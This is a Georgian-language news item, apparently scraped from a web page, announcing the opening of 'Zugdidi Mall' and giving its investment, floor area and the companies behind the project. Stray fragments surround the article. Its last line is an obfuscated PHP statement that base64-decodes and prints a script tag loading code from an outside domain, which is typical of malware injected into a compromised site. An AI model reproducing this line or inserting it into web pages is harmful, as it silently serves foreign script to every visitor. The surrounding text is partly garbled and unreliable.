celsiusi
ავერსი საქკაბელი
"ზუგდიდი მოლი" 29 ოქტომბერს გაიხსნება. როგორც პროექტის კონცეფციაზე მომუშავე Cushman & Wakefield Georgia-ში „ბიზნესპარტნიორს“ განუცხადეს, პროექტის ჯამური ინვესტიცია 26 მლნ ლარს შეადგენს.
 
მულტიფუნქციური სავაჭრო ცენტრის საერთო ფართი 15 000 კვადრატულ მეტრს მოიცავს.
 
სავაჭრო ცენტრი სამეგრელო-ზემო სვანეთის რეგიონში პირველი საერთაშორისო სტანდარტების შესაბამისი კომპლექსი იქნება, რომელიც ჰიპერმარტკეტს, საკვებ ობიექტებს და სხვადასხვა დანიშნულების ბრენდულ მაღაზიებს გააერთიანებს.
 
სავაჭრო ცენტრში წარმოდგენილი იქნება საერთაშორისო და ადგილობრივი ბრენდები: ტანსაცმელი, ფეხსაცმელი, პარფიუმერია, სახლის აქსესუარები, თეთრეული, ტექნიკა და სხვა. Cushman & Wakefield Georgia-ს ინფორმაცით, ამ ეტაპისთვის  ცენტრის 90% უკვე დატვირთულია.
 
პროექტის კონცეფციაზე Cushman & Wakefield Georgia–მ და კომპანია "ბლოქსმა" ერთობლივად იმუშავეს. ზუგდიდი მოლის" განვითარებას კომპანია "ბლოქსი" უზრუნველყოფს.
 
Cushman & Wakefield Georgia  სავაჭრო ცენტრის ფართების გაქირავების კამპანიას ექსკლუზიურად ხელმძღვანელობს. "ზუგდიდი მოლის" არქიტექტურულ ნაწილზე კომპანიამ  "გურგენიძე არქიტექტურა"  იმუშავა.a
666
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");